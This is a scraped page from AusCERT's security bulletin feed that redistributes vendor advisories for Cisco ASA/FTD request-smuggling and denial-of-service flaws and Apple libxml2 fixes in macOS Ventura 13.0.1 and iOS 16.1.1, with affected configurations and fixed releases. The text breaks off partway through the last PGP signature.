AusCERT - Security Bulletins

Latest published security bulletins. See https://www.auscert.org.au/rss/ for feed information.
Frissítve: 10 perc 23 másodperc
ESB-2022.3979.2 - UPDATE [Cisco] Cisco Adaptive Security Appliance Software:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.3979.2
Cisco Adaptive Security Appliance Software Clientless SSL
VPN Client-Side Request Smuggling Vulnerability
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Adaptive Security Appliance Software
Publisher: Cisco Systems
Operating System: Cisco
Resolution: Mitigation
CVE Names: CVE-2022-20713
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-webvpn-LOeKsNmO
Comment: CVSS (Max): 4.3 CVE-2022-20713 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVSS Source: Cisco Systems
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Revision History: November 10 2022: Vendor updated bulletin
August 11 2022: Initial Release
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Adaptive Security Appliance and Firepower Threat Defense Software VPN Web
Client Services Client-Side Request Smuggling Vulnerability
Priority: Medium
Advisory ID: cisco-sa-asa-webvpn-LOeKsNmO
First Published: 2022 August 10 16:00 GMT
Last Updated: 2022 November 9 16:03 GMT
Version 2.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCwa04262
CVE Names: CVE-2022-20713
CWEs: CWE-444
Summary
o A vulnerability in the VPN web client services component of Cisco Adaptive
Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD)
Software could allow an unauthenticated, remote attacker to conduct
browser-based attacks against users of an affected device.
This vulnerability is due to improper validation of input that is passed to
the VPN web client services component before being returned to the browser
that is in use. An attacker could exploit this vulnerability by persuading
a user to visit a website that is designed to pass malicious requests to a
device that is running Cisco ASA Software or Cisco FTD Software and has web
services endpoints supporting VPN features enabled. A successful exploit
could allow the attacker to reflect malicious input from the affected
device to the browser that is in use and conduct browser-based attacks,
including cross-site scripting attacks. The attacker could not directly
impact the affected device.
There are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-webvpn-LOeKsNmO
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco products if
they were running a vulnerable release of the following Cisco software:
ASA Software with Cisco AnyConnect VPN or Clientless SSL VPN enabled
FTD Software with Cisco AnyConnect VPN enabled
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Determine the ASA Software Configuration
To determine whether the software has a vulnerable feature enabled, use the
show-running-config CLI command. In the following table, the left column
lists the Cisco ASA Software features that are vulnerable. The right column
indicates the basic configuration for each feature from the show
running-config CLI command. If a device is running a vulnerable release and
has one of these features enabled, it is vulnerable.
Cisco ASA Feature Vulnerable Configuration
AnyConnect Internet Key Exchange crypto ikev2 enable client-services port
Version 2 Remote Access (with
client services)
webvpn
AnyConnect SSL VPN enable
Clientless SSL VPN webvpn
enable
Determine the FTD Software Configuration
To determine whether the software has a vulnerable feature enabled, use the
show-running-config CLI command. In the following table, the left column
lists the Cisco FTD Software features that are vulnerable. The right column
indicates the basic configuration for each feature from the show
running-config CLI command. If a device is running a vulnerable release and
has one of these features enabled, it is vulnerable.
Cisco FTD Feature Vulnerable Configuration
AnyConnect Internet Key Exchange crypto ikev2 enable client-services port
Version 2 Remote Access (with
client services) ^1,2
AnyConnect SSL VPN ^1,2 webvpn
enable
1. Remote Access VPN features were introduced in Cisco FTD Software Release
6.2.2.
2. Remote Access VPN features are enabled by using Devices > VPN > Remote
Access in Cisco Firepower Management Center (FMC) or by using Device >
Remote Access VPN in Cisco Firepower Device Manager (FDM).
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Cisco has confirmed that devices with remote access VPN services that are
configured to accept only AnyConnect Internet Key Exchange Version 2 Remote
Access VPN with client services disabled are not affected by this
vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
For information about fixed software releases, see the Details section in
the bug ID(s) at the top of this advisory.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is aware that
proof-of-concept exploit code is available for the vulnerability described
in this advisory.
The Cisco PSIRT is not aware of any malicious use of the vulnerability that
is described in this advisory.
Source
o Cisco would like to thank James Kettle of Portswigger.net for reporting
this vulnerability.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
Related to This Advisory
o
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-webvpn-LOeKsNmO
Revision History
o +---------+-----------------------+----------------+--------+-------------+
| Version | Description | Section | Status | Date |
+---------+-----------------------+----------------+--------+-------------+
| | Added FTD Software as | Title, | | |
| | an affected product. | Summary, | | |
| | Updated the affected | Vulnerable | | |
| | VPN component. | Products, | | |
| 2.0 | Clarified affected | Products | Final | 2022-NOV-09 |
| | software | Confirmed Not | | |
| | configurations. | Vulnerable, | | |
| | Removed the | and | | |
| | mitigation because it | Workarounds | | |
| | no longer applies. | | | |
+---------+-----------------------+----------------+--------+-------------+
| 1.0 | Initial public | - | Final | 2022-AUG-10 |
| | release. | | | |
+---------+-----------------------+----------------+--------+-------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yeSckNZI30y1K9AQhGsA/8CcLoLjgGbzfRz0LwoC8G7AISA0etOvrC
9bn8rBNSDMUvkzHjqTnff1AMrJgQM3mDK1r27HrgVNgSJbxengyd/IxwYF2CuGXl
g/S5sxtaeFVJMN/FsbhWIgm3PhOd85E8XhSabAV17SUch5RW853wMHCF+O/RzIIW
3/g3Q4Be12ffRwPx0fKocFKXy0SSWlcrnHHs+aFD2Xsw3kogCgyu2srvjk31yNr6
n633AHnAvWwHB18Xqv885EGGXqvmgMnm1iWtpF6g5m711Fl8EhOQioNARUzJSLBE
4b0POTNuzMEXlV9OiL6/PMIUllPPgvUfqFfBfz5MiPgX9jUUz58wB/jFVA9MeCgh
tCkOqUYRv7HTBgvCOgCLfD//E4i6QULBP9HsZbOptysOx3TovDbS0ynNulL6BNNn
n9FQY9a9WUnHtbuFx5VoLRiExoxKh/d1Ju668jWIKZKptHVTC/QDR+35m6rn/7eY
h6/5l7N5lE1BlaPLbbn8TBjeeJdRXqF9josut5snPenRf8VD7g0zxJ+MgUvVNRD2
t131sR844nM+ekcp3w3mk0eOkIHmdn8Po/4HRj23H3frudrhAK08o3qOyzX3Txtv
CR+0wffNmHwLidX6azusP02dgiKe4L7mZKxonIFMqWJ7UquAZEfcPieo8jY4lmnl
lwrqYsHjdrU=
=UK3D
-----END PGP SIGNATURE-----
ESB-2022.1912.2 - UPDATE [Cisco] Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.1912.2
Cisco Adaptive Security Appliance Software and Firepower Threat Defense
Software Web Services Interface Denial of Service Vulnerability
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Adaptive Security Appliance Software
Firepower Threat Defense Software
Publisher: Cisco Systems
Operating System: Cisco
Resolution: Patch/Upgrade
CVE Names: CVE-2022-20745
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-tzPSYern
Comment: CVSS (Max): 8.6 CVE-2022-20745 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)
CVSS Source: Cisco Systems
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
Revision History: November 10 2022: Vendor updated bulletin
April 29 2022: Initial Release
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Adaptive Security Appliance Software and Firepower Threat Defense
Software Web Services Interface Denial of Service Vulnerability
Priority: High
Advisory ID: cisco-sa-asafdt-webvpn-dos-tzPSYern
First Published: 2022 April 27 16:00 GMT
Last Updated: 2022 November 9 16:02 GMT
Version 1.2: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvz70595 CSCwb87950 CSCwb93914
CVE Names: CVE-2022-20745
CWEs: CWE-20
Summary
o A vulnerability in the web services interface for remote access VPN
features of Cisco Adaptive Security Appliance (ASA) Software and Cisco
Firepower Threat Defense (FTD) Software could allow an unauthenticated,
remote attacker to cause a denial of service (DoS) condition.
This vulnerability is due to improper input validation when parsing HTTPS
requests. An attacker could exploit this vulnerability by sending a crafted
HTTPS request to an affected device. A successful exploit could allow the
attacker to cause the device to reload, resulting in a DoS condition.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-tzPSYern
This advisory is part of the April 2022 release of the Cisco ASA, FTD, and
FMC Security Advisory Bundled publication. For a complete list of the
advisories and links to them, see Cisco Event Response: April 2022 Cisco
ASA, FMC, and FTD Software Security Advisory Bundled Publication .
Affected Products
o Vulnerable Products
This vulnerability affects Cisco products if they are running a vulnerable
release of Cisco ASA Software or Cisco FTD Software with a vulnerable
remote access VPN configuration.
For information about which Cisco software releases are vulnerable, see the
Fixed Software section of this advisory.
Determine the ASA Software Configuration
To determine whether the software has a vulnerable feature configured, use
the show running-config CLI command. In the following table, the left
column lists the Cisco ASA Software features that are vulnerable. The right
column indicates the basic configuration for each feature from the show
running-config CLI command. If a device is running a vulnerable release and
has one of these features configured, it is vulnerable.
Cisco ASA Feature Vulnerable Configuration
AnyConnect Internet Key Exchange crypto ikev2 enable client-services port
Version 2 Remote Access (with
client services)
webvpn
AnyConnect SSL VPN enable
Clientless SSL VPN webvpn
enable
Determine the FTD Software Configuration
To determine whether the software has a vulnerable feature configured, use
the show running-config CLI command. In the following table, the left
column lists the Cisco FTD Software features that are vulnerable. The right
column indicates the basic configuration for each feature from the show
running-config CLI command. If a device is running a vulnerable release and
has one of these features configured, it is vulnerable.
Cisco FTD Feature Vulnerable Configuration
AnyConnect Internet Key Exchange crypto ikev2 enable client-services port
Version 2 Remote Access (with
client services) ^1,2
AnyConnect SSL VPN ^1,2 webvpn
enable
1. Remote Access VPN features were introduced in Cisco FTD Software Release
6.2.2.
2. Remote Access VPN features are enabled by using Devices > VPN > Remote
Access in Cisco Firepower Management Center (FMC) or by using Device >
Remote Access VPN in Cisco Firepower Device Manager (FDM).
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Cisco has confirmed that this vulnerability does not affect Cisco Firepower
Management Center (FMC) Software.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o Cisco has released free software updates that address the vulnerability
described in this advisory. Customers with service contracts that entitle
them to regular software updates should obtain security fixes through their
usual update channels.
Customers may only install and expect support for software versions and
feature sets for which they have purchased a license. By installing,
downloading, accessing, or otherwise using such software upgrades,
customers agree to follow the terms of the Cisco software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.
The Cisco Support and Downloads page on Cisco.com provides information
about licensing and downloads. This page can also display customer device
support coverage for customers who use the My Devices tool.
When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Customers Without Service Contracts
Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c
/en/us/support/web/tsd-cisco-worldwide-contacts.html
Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.
Fixed Releases
In the following table(s), the left column lists Cisco software releases.
The center column indicates whether a release is affected by the
vulnerability described in this advisory and the first release that
includes the fix for this vulnerability. The right column indicates whether
a release is affected by any of the Critical or High SIR vulnerabilities
described in this bundle and which release includes fixes for those
vulnerabilities.
ASA Software
Cisco ASA First Fixed Release for First Fixed Release for
Software Release CSCvz70595 CSCwb87950 and CSCwb93914
9.6 and earlier ^ Not vulnerable. Not vulnerable.
1
9.7 ^1 Migrate to a fixed Migrate to a fixed release.
release.
9.8 9.8.4.44 9.8.4.46
9.9 ^1 Migrate to a fixed Migrate to a fixed release.
release.
9.10 ^1 Migrate to a fixed Migrate to a fixed release.
release.
9.12 9.12.4.35 9.12.4.52
9.13 ^1 Migrate to a fixed Migrate to a fixed release.
release.
9.14 9.14.3.13 9.14.4.16
9.15 9.15.1.21 Migrate to a fixed release.
9.16 9.16.2.7 9.16.3.15
9.17 Not vulnerable. 9.17.1.16
9.18 Not vulnerable. 9.18.1.3
1. Cisco ASA Software releases 9.7 and earlier, as well as releases 9.9,
9.10, and 9.13, have reached end of software maintenance . Customers are
advised to migrate to a supported release that includes the fix for this
vulnerability.
FTD Software
Cisco First Fixed Release for CSCvz70595 First Fixed
FTD Release for
Software CSCwb87950 and
Release CSCwb93914
6.1.0
and Not vulnerable. Not vulnerable.
earlier
^1
6.2.2 ^1 Migrate to a fixed release. Migrate to a
fixed release.
6.2.3 Migrate to a fixed release. Migrate to a
fixed release.
6.3.0 ^1 Migrate to a fixed release. Migrate to a
fixed release.
6.4.0 6.4.0.13 6.4.0.16
6.5.0 ^1 Migrate to a fixed release. Migrate to a
fixed release.
6.6.0 6.6.5.1 6.6.7.1
Cisco_FTD_Hotfix_AA-6.7.0.4-2.sh.REL.tar
6.7.0 Cisco_FTD_SSP_FP1K_Hotfix_AA-6.7.0.4-2.sh.REL.tar Migrate to a
Cisco_FTD_SSP_FP2K_Hotfix_AA-6.7.0.4-2.sh.REL.tar fixed release.
Cisco_FTD_SSP_Hotfix_AA-6.7.0.4-2.sh.REL.tar
7.0.0 7.0.2 7.0.4
7.1.0 Not vulnerable. 7.1.0.3
7.2.0 Not vulnerable. 7.2.1
1. Cisco FMC and FTD Software releases 6.2.2 and earlier, as well as
releases 6.3.0 and 6.5.0, have reached end of software maintenance .
Customers are advised to migrate to a supported release that includes the
fix for this vulnerability.
For instructions on upgrading your FTD device, see Cisco Firepower
Management Center Upgrade Guide .
The Cisco Product Security Incident Response Team (PSIRT) validates only
the affected and fixed release information that is documented in this
advisory.
Exploitation and Public Announcements
o The Cisco PSIRT is not aware of any public announcements or malicious use
of the vulnerability that is described in this advisory.
Source
o This vulnerability was originally found during the resolution of a Cisco
TAC support case.
Cisco would like to thank Saleh Iskandar from Indonesia for reporting that
the fix for the vulnerability was incomplete.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
Related to This Advisory
o Cisco Event Response: April 2022 Cisco ASA, FMC, and FTD Software Security
Advisory Bundled Publication
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-tzPSYern
Revision History
o +---------+----------------------------+-----------+--------+-------------+
| Version | Description | Section | Status | Date |
+---------+----------------------------+-----------+--------+-------------+
| | Updated fixed release | | | |
| | tables to reflect | Fixed | | |
| 1.2 | additonal fixes for Cisco | Software, | Final | 2022-NOV-09 |
| | bugs CSCwb87950 and | Source | | |
| | CSCwb93914. Also updated | | | |
| | source. | | | |
+---------+----------------------------+-----------+--------+-------------+
| 1.1 | Updated ASA 9.8 first | Fixed | Final | 2022-JUN-01 |
| | fixed release information. | Software | | |
+---------+----------------------------+-----------+--------+-------------+
| 1.0 | Initial public release. | - | Final | 2022-APR-27 |
+---------+----------------------------+-----------+--------+-------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2ydOskNZI30y1K9AQimBg//TyogwxU7yd7sPkO55Iw36QlpxM5o8sLh
TcwwEubm2EYU3rtS9KFPB4DmZg4G7qTHRqEGlA6GU/DYPZCR8PmfmNGq2yMh2X34
/tbdGOSt97bIgscf6CcpBGNPxePE9kagqNa9SCjEfn5tQJ/xAOLmDAe5oS59oNt5
nC2oChwSksZPiHD0uuL2zKZkExEsssyJbrww4hJUvB/eQ1yGyRw7+M9e0Er6g10+
jyfzFGeSsvwn6Vbgf/0dATIa9jSb5s75R6Uj3kRhUkFN0DI6O/zCCfpnWl6us1ML
tnVGkieAdQH23NUQstg9lEPJiw3eR+PUwORjyD0D+ASrKVE61bLsBs7wU21URzNk
keGY0XU9njRBT2EMK80FcREk0sSKi9mdxdjutzb9fq2HHORZJStZPlAo9ksWimEv
oydTjY8FGRU02umMq3y1mKVgDhSVfYgzNvT5a22H+lBq5gghQ3rBCM4WGhq+9Y6o
4YLE7GE4kr9uAlcpd/xqsHD5Bl2tH+ZUGurA81wJ9k+IpawNLvodMuzBVgpL+cv9
bmWfK38H04ozQJ9I9yeQStjQeB5WAvT4ok6O7YLcXsPRLP3pHsmNhCKl+/zDmkd1
cBknkhuKsYMf+1GCN8xHyB4ub3hgJXQdlz12GUKoH2R09f1aYv4InP+tKxG1QBzp
C5CXy8a2HAM=
=5PGy
-----END PGP SIGNATURE-----
ESB-2022.5793 - [Mac] macOS Ventura 13.0.1: CVSS (Max): 8.2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5793
APPLE-SA-2022-11-09-2 macOS Ventura 13.0.1
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: macOS Ventura 13.0.1
Publisher: Apple
Operating System: macOS
Resolution: Patch/Upgrade
CVE Names: CVE-2022-40304 CVE-2022-40303
Original Bulletin:
https://support.apple.com/HT213504
Comment: CVSS (Max): 8.2 CVE-2022-40304 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-11-09-2 macOS Ventura 13.0.1
macOS Ventura 13.0.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT213504.
libxml2
Available for: macOS Ventura
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: An integer overflow was addressed through improved input
validation.
CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2
Available for: macOS Ventura
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project
Zero
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
- -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNQACgkQ4RjMIDke
NxkkbBAAsAYMux+v/27NK6+FvyxrTRLkR0yyzp8SorMSfPwZInNGkkEmQxjSzI0+
D3rK9usf/pouEV9LMnR+Uf37pEdlpSDD7uXZ81m1vhN6RPkz2qD5WdM46RaWTbAS
/xe3ZEu8+Jpr5SQSWuI+QIBr/vn9Txu/N6l/WQVxnWS+RSWO6tZLLOXMEyVk9vPx
XJGyQywt3XYoVksvzwAgm/2yslQ+0OWphWjLp73bjQGrrIiClphxmtyvA0SN8Nds
Ah0+X8SRjCErSN4736U1htKtClSHDowdaD2wevGGUrdRSLJQLTPPkqUPF3P/4/8i
xW42Zgf9qucN9O89P7ONvHOIe8swtD9vf1AjFXvsDqQvMZQVFDBNXbG138V4LLws
f5UdpUmY/0lSnVpAZQlo+xuMJSb3SMWYIB2ozhzDLHgBKTxERFB7uyrEYQgXs9XB
1qg+BbW5uooEoMKbutw36/II/JTFRM34QxWiOJHw4cCypmuaGkSJ/8jsTJDlRvG/
T9BchgHjBvqHFtCVNLGikkVYzEVQnQLXQAZoZMCYV0benebEIFLIaObaciQqA3F2
N7/rvpXd5l6G3sEGwqMPT5aYj6Vm/0LBnxuTlN1xN1wgOQoS+LWL8bW+8/HjtJLa
eyWMh8yD0o02Hf6dNIl9RTuoAKwZvmJbeqi/1uEaoL8sAP9gK1s=
=CjcG
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yVl8kNZI30y1K9AQh66hAAn2fzX4ayGU1CEjBckDBQY8wip0brUlgS
If3Ou0Ysb3u5vSQgqzxNG92AZqbzwdxZlgxv/1HNkQIuqp5dr3Wh+R3tAe0ayxPU
2ma/4jT1x4f+nw08htsRuV9bUHcKKutxPweMbyRMwoqI9MQ8g64wjnM6ouJiTME9
rSBfStdvgD6z0ccPOIxtyBx4RDuk7RSVSieElpCAlxqFmsei5OyGWCyoVUkQW/tr
Mu+YaiBLpkikQ/EVIHmhsMOYLLPsipE+V/RV6r23rZTW3TkkYotnwC46yaL/vO7V
HrnjcXKl830f8IFi/d6Qcy+GcX6TUt2sFXTbtSsQcXg6ikZYPyOuYNl2Xj6oWi2x
Kba9VVO6OUR8aOKw8GyNoY4EH7RklSalwhiWYczUvGkh7mY6RBJg92ymLDXuBe5q
d16jtZ7XGVEfMLxxgIBGgcJJtt0A7LX53+GQFw1dh304mJl1cXxZWGUqjp7jsnVV
QYauntcJ527zJXe+1IML2vIs0Dv37+B//OH6SIeGKFTXK008MRQ/+QS+oZEsb/9l
13a6+dj4PmWKXdu778FojrcUq5glC4qnCJPdaMOKRLY7i3wUxsUZo1ROY8QeqNCK
rCsgpzGCJ0QFKy6FNAoOR8cNJaAm0dH7BhgaHzRhxZ/InwgR2iwIun2KHVW0IL6s
WtOAQ3B9nqo=
=6x7q
-----END PGP SIGNATURE-----
ESB-2022.5792 - [Apple iOS] Apple: CVSS (Max): 8.2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5792
APPLE-SA-2022-11-09-1 iOS 16.1.1 and iPadOS 16.1.1
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: iOS 16.1.1
iPadOS 16.1.1
Publisher: Apple
Operating System: Apple iOS
Resolution: Patch/Upgrade
CVE Names: CVE-2022-40304 CVE-2022-40303
Original Bulletin:
https://support.apple.com/HT213505
Comment: CVSS (Max): 8.2 CVE-2022-40304 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-11-09-1 iOS 16.1.1 and iPadOS 16.1.1
iOS 16.1.1 and iPadOS 16.1.1 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT213505.
libxml2
Available for: iPhone 8 and later, iPad Pro (all models), iPad Air
3rd generation and later, iPad 5th generation and later, and iPad
mini 5th generation and later
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: An integer overflow was addressed through improved input
validation.
CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2
Available for: iPhone 8 and later, iPad Pro (all models), iPad Air
3rd generation and later, iPad 5th generation and later, and iPad
mini 5th generation and later
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project
Zero
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
- -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNIACgkQ4RjMIDke
Nxl2og/7Bwq+DwNmc4conLeNZ/4RVZ8Abf2kKMj71ZJrSov1lvW6W9l3NswznKc9
pV0Cack8zm1she6dr+HNMYFcsSbFF/OTPKsf2jlZ3aZY5on7FpDdzB8bLDbw0dvS
nO2Oc1mgcsBMIuSJBliUfgF0d6L6Hrj7L8Ja0pQP0W5BhcbWbd91wgj2KAQpaX6r
gh7oEy7W5GRPJwLAdOfHmpzWws+PjZ3DMlLuGvGRLwEyizsLbq6rX166KG+asXZz
CeWygTuKKcpZHG6FwahogBFnfl1ccTGJv4UV/9Ks3WEaZCGx5lpkgw+5H9Wx2HgX
